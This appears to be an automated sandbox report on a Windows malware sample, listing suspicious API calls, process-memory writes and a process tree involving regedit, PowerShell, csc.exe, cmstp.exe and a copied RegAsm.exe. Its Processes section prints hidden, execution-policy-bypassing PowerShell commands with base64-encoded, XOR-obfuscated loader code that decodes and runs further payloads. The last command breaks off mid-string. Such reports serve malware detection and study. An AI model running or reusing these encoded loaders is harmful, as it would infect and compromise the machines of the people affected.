N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3740 wrote to memory of 4592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3740 wrote to memory of 4592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 2204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 2204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2204 wrote to memory of 2236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2236 wrote to memory of 3968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2236 wrote to memory of 3968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2204 wrote to memory of 2364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\system32\cmstp.exe
PID 2204 wrote to memory of 2364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\system32\cmstp.exe
PID 4592 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 4592 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 4592 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBkAEcASgA0AGYAMQBKAHIAWgBIAFYAbwBhAFYASgA1AFkAbQBaAG8AWQAxAEoAbABhAEgAOQBvAEsAaQAxAHcATgBpADEAawBhAEgAVQB0AEoAVwBSADYAZgB5ADAAZwBXAEgAOQBrAEwAVwBWADUAZQBYADEAKwBOAHkASQBpAGEARwBCADkAZQBYAFEAagBZADIAcAAvAFkAbQBZAGoAWgBHAEkAaQBmAG4AbAA0AGIAeQBOADUAZABYAGsAdABJAEYAaAArAGEARQA5AHMAZgBtAFIAdQBYAFcAeAAvAGYAbQBSAGoAYQBpADAAZwBSAFcAaABzAGEAVwBoAC8AZgBpADAAcABaAFcAaABzAGEAVwBoAC8AZgBpAFEAMgBMAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABQAGIASAA1AG8ATwB6AGsAdABNAEMAMABsAFMAbQBoADUASQBFAFIANQBhAEcAQgBkAGYAMgBKADkAYQBIADkANQBkAEMAMABnAFgAVwB4ADUAWgBTADAAcQBSAFUAWgBPAFcARABkAFIAWABtAEoAcgBlAFgAcABzAGYAMgBoAFIAUQB5AEoATQBLAGkAMABnAFEAMgB4AGcAYQBDADAAcQBhAEcATgB1AGYAMwBSADkAZQBTAG8AawBJADIAaABqAGIAbgA5ADAAZgBYAGsAMgBMAFMAbABtAGEASABRAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAwADUAaQBZADMAdABvAGYAMwBsAFEATgB6AGQATABmADIASgBnAFQAMgB4ACsAYQBEAHMANQBYAG4AbAAvAFoARwBOAHEASgBTAHAAZgBYADIAVgA1AGEAMwBSAEIAWAAzAHQANgBTAFUAUgBhAGEARwBoADMAZgBEADEAbwBaAG0ASgBNAE0ARABBAHEASgBEAFkAdABLAFcAUgA3AFUAbQB4AGoAYQBWAEoAcABiAEgAbABzAEwAVABBAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAE8AWQBtAE4ANwBhAEgAOQA1AFUARABjADMAUwAzADkAaQBZAEUAOQBzAGYAbQBnADcATwBWADUANQBmADIAUgBqAGEAaQBVAHAAYQBHAE4AdQBmADMAUgA5AGUAVwBoAHAAVAAyAHgAKwBhAEQAcwA1AEoARABZAHQASwBXAFIANwBMAFQAQQB0AEsAVwBSADcAVQBtAHgAagBhAFYASgBwAGIASABsAHMAVgBqADAAagBJAHoAdwA0AFUARABZAHQASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBWAEoAcABiAEgAbABzAEwAVABBAHQASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBWAGoAdwA3AEkAeQBNAHAAWgBIAHQAUwBiAEcATgBwAFUAbQBsAHMAZQBXAHcAagBRAFcAaABqAGEAbgBsAGwAVQBEAFkAdABLAFcAeABvAGYAaQAwAHcATABVAE4AbwBlAGkAQgBDAGIAMgBkAG8AYgBuAGsAdABYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBNAGEASAA1AEEAYgBHAE4AcwBhAG0AaABwAE4AaQAwAHAAYgBHAGgAKwBJADAAQgBpAGEAVwBnAHQATQBDADEAVwBYAG4AUgArAGUAVwBoAGcASQAxADUAbwBiAG4AaAAvAFoASABsADAASQAwADUALwBkAEgAMQA1AFkAbQBwAC8AYgBIADEAbABkAEMATgBPAFoASAAxAGwAYQBIADkAQQBZAG0AbABvAFUARABjADMAVABrADkATwBOAGkAMABwAGIARwBoACsASQAwAFoAbwBkAEMAMAB3AEwAUwBsAG0AYQBIAFEAMgBMAFMAbABzAGEASAA0AGoAUgBGAHMAdABNAEMAMABwAFoASABzADIATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAdABNAEMAMABwAGIARwBoACsASQAwADUALwBhAEcAeAA1AGEARQBsAG8AYgBuADkAMABmAFgAbABpAGYAeQBVAGsATgBpADAAcABhAFcAaAB1AFkAbQBsAG8AYQBVADkAMABlAFcAaAArAEwAVABBAHQASwBXAGwAbwBiAG4AOQAwAGYAWABsAGkAZgB5AE4AWgBmADIAeABqAGYAbQB0AGkAZgAyAEIATABaAEcATgBzAFkAVQA5AGgAWQBtADUAbQBKAFMAbABvAFkAMgA1AC8AZABIADEANQBhAEcAbABTAGEAVwB4ADUAYgBDAEUAdABQAFMARQB0AEsAVwBoAGoAYgBuADkAMABmAFgAbABvAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBTAFEAMgBMAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AWgBhAEgAVgA1AEkAMABoAGoAYgBtAEoAcABaAEcATgBxAFUARABjADMAVwBGAGwATABOAFMATgBLAGEASABsAGUAZQBYADkAawBZADIAbwBsAEsAVwBsAG8AYgBtAEoAcABhAEcAbABQAGQASABsAG8AZgBpAFEAMgBMAFMAbAB2AGQASABsAG8AZgBpADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBUAG0ASgBqAGUAMgBoAC8AZQBWAEEAMwBOADAAdAAvAFkAbQBCAFAAYgBIADUAbwBPAHoAbABlAGUAWAA5AGsAWQAyAG8AbABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABiAEgANQBvAE8AegBrAGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGUAWQBXAGgAbwBmAFMAMABnAFgAbQBoAHUAWQBtAE4AcABmAGkAMAAvAE4AaQAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFQAQQB0AFYAbAA1ADAAZgBuAGwAbwBZAEMATgBFAFEAaQBOAGQAYgBIAGwAbABVAEQAYwAzAFMAbQBoADUAVwBXAGgAZwBmAFYAMQBzAGUAVwBVAGwASgBDADAAbQBMAFMAcABmAGEARwBwAE0AZgBtAEEAagBhAEgAVgBvAEsAagBZAHQAVgBsADUAMABmAG4AbABvAFkAQwBOAEUAUQBpAE4ATABaAEcARgBvAFUARABjADMAVwBuADkAawBlAFcAaABNAFkAVwBGAFAAZABIAGwAbwBmAGkAVQBwAGUAVwBoAGcAZgBVAHQAawBZAFcAaABkAGIASABsAGwASQBTADAAcABiADMAUgA1AGEASAA0AGsATgBpADEAZQBlAFcAeAAvAGUAUwBCAGQAZgAyAEoAdQBhAEgANQArAEwAUwBCAEwAWgBHAEYAbwBYAFcAeAA1AFoAUwAwAHAAZQBXAGgAZwBmAFUAdABrAFkAVwBoAGQAYgBIAGwAbABMAFMAQgBhAFoARwBOAHAAWQBuAHAAZQBlAFgAUgBoAGEAQwAxAEYAWgBHAGwAcABhAEcATQA9ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABNAEYAcQBCAHEAQwB1AHEAIAA9ACAANwA2ADgANQANAAoAIAAgACAAIAAkAEQATQBPAGEAVgBqAE4AZQAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABHAEoAcgBXAGsAWgB0AHMAKQAgACoAIAAyADMAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABFAHgAZwBGAHgAVQBUAEUAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABIAHkAVQBPAFkAQQBMAGIAIAA9ACAAIgBPACIADQAKACAAIAAgACAAJABjAG8AawBNAE8AbgBQAG4AIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABXAGgAbQB2AHcAbwBMAG0AIAA9ACAAIgBQACIADQAKACAAIAAgACAAJABlAHcARgBpAE8AeQBaAG0AIAA9ACAAIgBBACIADQAKACAAIAAgACAAJABLAGIAWgB3AEUARABhAFEAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABRAEYAYwB6AHYAcwBkAGEAIAA9ACAAIgBCACIADQAKACAAIAAgACAAJABqAHAAQgBvAEEAcgBSAFkAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABuAG4AUwBDAGcAcgBzAHcAIAA9ACAAIgBmACIADQAKACAAIAAgACAAJABYAE4AawB2AGwAagBrAE8AIAA9ACAAIgBUACIADQAKACAAIAAgACAAJABpAEUAZwBFAEEAbABpAE0AIAA9ACAAIgBDACIADQAKACAAIAAgACAAJABZAE0AeQBrAHAAeABhAFoAIAA9ACAAIgBpACIADQAKACAAIAAgACAAJABwAGMAVABKAEIAWQBMAE4AIAA9ACAAIgB6ACIADQAKACAAIAAgACAAJABNAHAAUwBWAG4AagBYAEgAIAA9ACAAIgBYACIADQAKACAAIAAgACAAJABTAE0AbQBBAEgAcQB1AHMAIAA9ACAAIgBBACIADQAKACAAIAAgACAAJABwAFIAQQByAGkAdgBPAGUAIAA9ACAAIgBVACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAMQAzACAAKwAgADMAMwANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADcAKQAgAC0AIAAoACQAdAAxACAALwAgADYAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADcAIgAgACsAIAAiAE8AIgAgACsAIAAiADcAIgAgACsAIAAiAFAAIgAgACsAIAAiAEEAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEoAIgAgACsAIAAiAEIAIgAgACsAIAAiAEsAIgAgACsAIAAiAGYAIgAgACsAIAAiAFQAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAEMAIgAgACsAIAAiAGkAIgAgACsAIAAiAHoAIgAgACsAIAAiAFgAIgAgACsAIAAiAEEAIgAgACsAIAAiAFUAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBXAHAAVgBiADMAWgA5ADEAVABVAHUARABPADUAQQBmAGgANwBXAGQATABaAFkAUABjADUAQgBHAHYAYgBzAE0AawBGAEQAVwBzAFIAYQAwAGUAMgAzAEQAVQBnAFcARwBsAHoAQgBHAGUAYgBOAG8ASQBUAEIANQBNAHUANwBCAEgAMwBKAHoAdwBuAG0AQwA0AGgAMwA1AEkAMABjAGYAdwBpADMAQwBiAFoAYwBNAGsAbgBFAEMANQBSAGYAVwBCAFgAYwA0AGIAQwBGAFkAMAA4AGEANAByAEEASQBJAEsAQwBCAGoAMQBzAHEARwBVAHYAQQBNAGoAeQBSAHUAcgBkAEoAVABhAE8ATgA4AEYAVABTAFQAWgB3AFQAaABZAFEAbQBUAGoANQBIAGoATQBnAFIAZwBoAGkARwB3AGcAYwB4AFYAZABSAHkAVwAzAGkAdQBqAEQAaABCAFMASwBtAHoAagBWAGoAMwBrAHcAOAB4ADIAbwBzADgANABJAHMAYQBOADQAcQBCADAANABPAFYAVgBrAHYARAAwADQAYgBhAEkANAAyAFcAQwBwAC8AVAA4AFgANQB2AGYANgB4AEIAKwA4AGIATwBEAEMAaQAyAEwANABwAFQAdwB5ADgAQwA5AGwAVwBiAGsAawBYAFIARABwADIAVgBlAG0ASABnAEsAVgAyAEEANgBCADMARgA4AGoASABhAFMAdQBRAE0AYwA0AEkAbwBTAFIATABiADIAdgBGAFAAQQBpADgAbwBQADQAdABuAC8ANABrAEMARABwAFcATABhADgAUABUAEkAUwA0ADQAdQBpAFUAaABQAG8ATQB1AG8AQQBXADAAZABLAFcAZABNAGgANwBnAHQAOABKAE8AZwBHADUAUAA4AG4AawBIAEsALwBRAHgARABzADYAdwBrAEYAcAA5AC8AVgA0AFIAVABpAEUATwBnAGkAQwB6ADcAUABVAFgAcABSAHIAeAA3AE8AMQBVAG8AUQBoAG0AdQArAE0ANwB3ADkAQwBIAEYAMgB0ADQAbwBFAE4AbQAxAEIAUQBGAHIAVQBDAGcASwB6AG0AcABxAE8AeQA4AGUAagArAFkAZABVADUAVABpAGEAMQBEAGcAUwBuAFUAZgA2AEcAagBzAFkAWgBqAEIAcABFAGMAdAB6AG0AbQByAFMAawBrAFQATABHAHIAOABmAGYAWABYAHIAYgBqAEgAVQBQAGYAcQBYAGwAVwBQAEIAVQBIAGkAQwBRAHMAKwAvAHQAMAAzAFEARgB5AE8AegBZADIALwBXAEsAagB3AHMAMwBVAHEAdgBnADAAQwBLAGIAZQB0AGQAcgBjAFkAVQAzAFYAdgBzAG8AVgA0AFEAMABuAHkAWgA0ADQAbQA0AEsARQBrAGgAeQB2AGQASwBDAHoATwBuAHgAWABOAC8ARwBkAFAAWgA0AGQAcwB0AHgASgB4AGoAbwBKAFUAcgBtAHoAMgBxAGwAQgBKAEYAYgB0AEkAMABpAFcAMABiAFQAbwB5AEIAOQBrAFQAYwBVAFkAWABoAEEAdgBIAHkAeQAyAEMAZgB4ADMANgBwAFAAagBSAGYASgA2AG4AKwBhADEANwBXAC8AWQBOAHEAYQA4AGQAaQBnAEoAKwBQAHgAMQBLAFIANQBiADUASwBXAFgAZwBLADkAZQBsADcASQBaAGkAQQBRAFcAUABLAHcAWQBOAGwAVwBpADYANABoAGgAYgBuAGUAZgBEAG0ASABHAHoAYgBHAEoANAAyAHQARgBxAGsAcQBmAFAAVwBPAHEAZABXADYAaQB5AHUAbgB0AEgARABOAEcAQgBLAHAAdwBxADUANgBJAG4AawBBAHoAVwBFAG4ASABOAGIALwB3AG8ANAB4AGYAdABnADAAOQAzAGoARABYAFYAcQAvAHoAbQBsAG0AdQBJAFcAdgArAFgAeQBpAGQAWQBQAGwAWgBYAFEAMgBRAG8ATgBQAFEASABvAEwAcQBGADgAQwBNAGQAcwByAFYAdQBvAFMAZgByADcATABGAEMAVwBDAFUAMQBxAFUAeABXAGYAWABzADgAdgArADMAVwBWAFkAdgBTAFkAUABmAGMAdgBXAG0AUQBrAHcAdABXAG8AeQBZAG8ATwBYADgAcwBrAE0ARABmADIAcgB6AEUAVwB2AEcAcgBuADAAaABxADMAWABEAG0AdABZAFoATABuAC8AKwB1AFIAWQBjAGQAZwBLADEALwBxAHcAeQBpAFkAbQA2AGcAUQBwAEcAbQB1AGEAMABWAGwAMQBIAFcASQBBAFoASgB4AC8AMgA4AGMASwBZADMAcwA5AEYANwB5ACsAMwBoAG0AVgBkAEUAcwBsAGYARwBsAHcAVQBkADEASgBrAEwARAA1AHoAcgBKAHEARwBFAEIAaQB0AG0AeAB0AEQAVQBwAG0AcQBmAFAAOAA0AEIAWgBQAHcAYQBHAHAAaABzAGsAdAAzAG0AZgA4AFkAZQBoADgANQA4AG4AVgBiAFoAagBlAFkATABtAC8ANgAxADAAQQBZAGUASQB3AEUAbQBIAHkAQwA0ADcANgAxAFcAdQB1ADgAdgAwADQALwBhAFEATgB3AC8AWgB6AGwAUwBUAGgAcAA5AGIATwBPADkAbwBxAEcANwBoAE8ATAByAFUAcAB6AEEAUABPAGEAegB1AGMAVQBUAGQAVwBzADkAQwBIAFMANwBRAFUAYgBYAGoALwBaAFkAWgB0AHEAdABmAE0AdgB6AEkASwAzAHYAbgBNADYALwA4AGUAUQBYAEMAYQBTADcARgBnADQAMwBqAG4AbgA1AHQALwAzAG4ASgArAHAATwBOAHEAQgBjAFMASwBGAHkAYgBFAHAAMwBYAEgATgBMAHMAUwB1AEIATgBWAFYAdQBtADIAVABKAHYAMQA3AFYAVgBPADcAVABRAFEASABZAHcAdgBSADcAYgBwADIASQBIAEoAcwBiAFkARwBsAEEAbgBwAEkAYwBQAGoARQBxAFQAagBIAGgAVQBrADYAZgA1AG0AawBCAHoAUwBMAEUAOAAzAEwAeQBiAFkASQA5AFAARgBTAFQAaABHAEsAZgB4ADIAMwBaAFAAYgB3AFYAUwBtAEoAeABsAGoAQgB0ADUAVwA2AHoAUwA5ADUASAAzAGUANQBZAFAAcwBGADcAcwA1ADkATwBGAEsAOQBaAHAAZwBUAG8AdQBRADEAUgBxAFYAeABMAHYAQQByAHoAbwA1AFIARAA1AEUAcgBvAGwAVgA2AGMARQBvAEwARwAxAHMAcQA0AE8AeABjAG4AWQA5AFMAQwA1AFQAegA4AGUAbgBwAEQASABDAHMAagBUAEgAVwBDAE0AagBnAEcAOQBKACsAWABrADQASwA5AFgAYQAzAEsAWABBAGgAdwBiAFIAcwBwAHAASAB5AFEAbQBPAGoARgBlAHIAMgB6AEMASQB1AE0ASgBxAFAATwBrAGEAMAB2AGQAZwBRAHMAeQB3ADgAYgB3AE8AOAA0AGwAQgBwAEIAZQB2AHMANQB1AGoARwB2ADkAKwBnAEgAZABkAEoAVwBVADUAbgBSADYAeABQAGwAVQBMAEUARAA5AGMAWABPAG4ARgBtAHgAYQBGAEgAcwA4AEEAVAAxAEIAZgBkAGQAZABSAFEATQBZAGEANwA3AEEASwBlADQAdQB2AE0AWQAxAHUAagBGAFkAcQBjADAAYgArADQAcQBuAHgANwAzAFEAZABFAEsAYgBGAEoAQgBiAGoAVABNAGQAYwBqAFEAOAA5AE4AZQBsAFcANQBXADUATQBmAEEAdABHAHoAYwBpAE4AUwBOAHcAYgBCAGsASwBNADEAbQBzAEUARABIAHoAaABzADIANQB4ADAAYQBhADAANQBtADYAVAA5AE0ATABNAFEAVQBWAGIAegB0ADMATABsAFAAMABkAHQAWgBMAGIATgBnAGMAeABWADcAUABYAFIAagBFAHgAYwBxAG0AWAB5AE0AeAB0AGYAMABuAHcAcQBKADkAagBoAFAAVABCAFkAcwB4AGYAagBwAFAAZABoAEkAWABXADAASQBQAFIAKwBqAEgAdgBtACsARgBzAEIAegBiAGEAQgBTAEkAeABxAFMAQQB6ADUASwA0AFoAMQBXAFEASwBsADUAYgBkAFoARABmAGkAWgByAGQAMABnAFQARQA2AEMAegBzAGgASwBWAEYAVgBOADAAZgBuAHkAOAAwAFQAcgBzAE4ARQB3AEMAQQBkAFUAWABKAGEAUABPAEEAawBpAEoAVgBsAE0AbgA5AGoANgB1AEwAOABLAEQARQBIAHYARABsAFgAKwBMADIANQBIAHYARgBxAHEAdQBIACsAWABwAGIAVwBBAGkAagBSAFAASQAyADQASQBJAEIAVQBQAHgAZABOAGQATQBUAG8AMgBhAE8AcwBGAEwAWgBRAGoAcgAvAHIATwAvAEEAMwBDAGsAUABCAFoAUQBNAFkAUAAwAFkANwB2ADYANgBRAGUANwB6AGIAeQBCADgAQQB1AFYAVgBmAE4AQQByAEMAdQBMAEEAbgBVAEMAVgA0AHAAagB6AGUASQBMAHQAYQA1AFQAMwBsADMAUABHAFQAOABXAHAAQgB0ADUAOABhAFMARAB3AEgAQgAyAHMAbQA0ADEAYQBpADUARQBtAGEAUgByAGoAWABJAFEAMABVAFUAQwBnAEcATwAwAFAAUQBRAHYAdwBTADcAOQB1AEkASwB6AFcANwBxAGwATwBDAHcATgBlAFUATQB6AHkAQwBUADYARABvAFIAVABqAE8ATABaAHUAbABtADYARwBzAG4AZgBjADYARQBoAFkAUABjAG4AWgB4AHkATABnAHoAYwBzAGwASQBKAFUATgByADUAWABZADEAegBtAGgAYgAwADcAWAAzAEMAdwBDAGwAQQBnADUAaQAxAGoASgBVAHYAQQBvAEUAeABlAGwAMABaAEYASAArADYAbwBNAHQAaAAyAE0ANwBUAGoAbgBaAEgAKwAwAEgAbwBWADEAMQA3AFgAdABvAEsASwBtAFAAYgBzAEYAcABnAHAAdABiAE0AOABkAEwAcAAyAG8ARwBjACsAVQBVAG8AQwBJADEAbgBxAEYAUgBGAHYAUwBwAHoAcABnA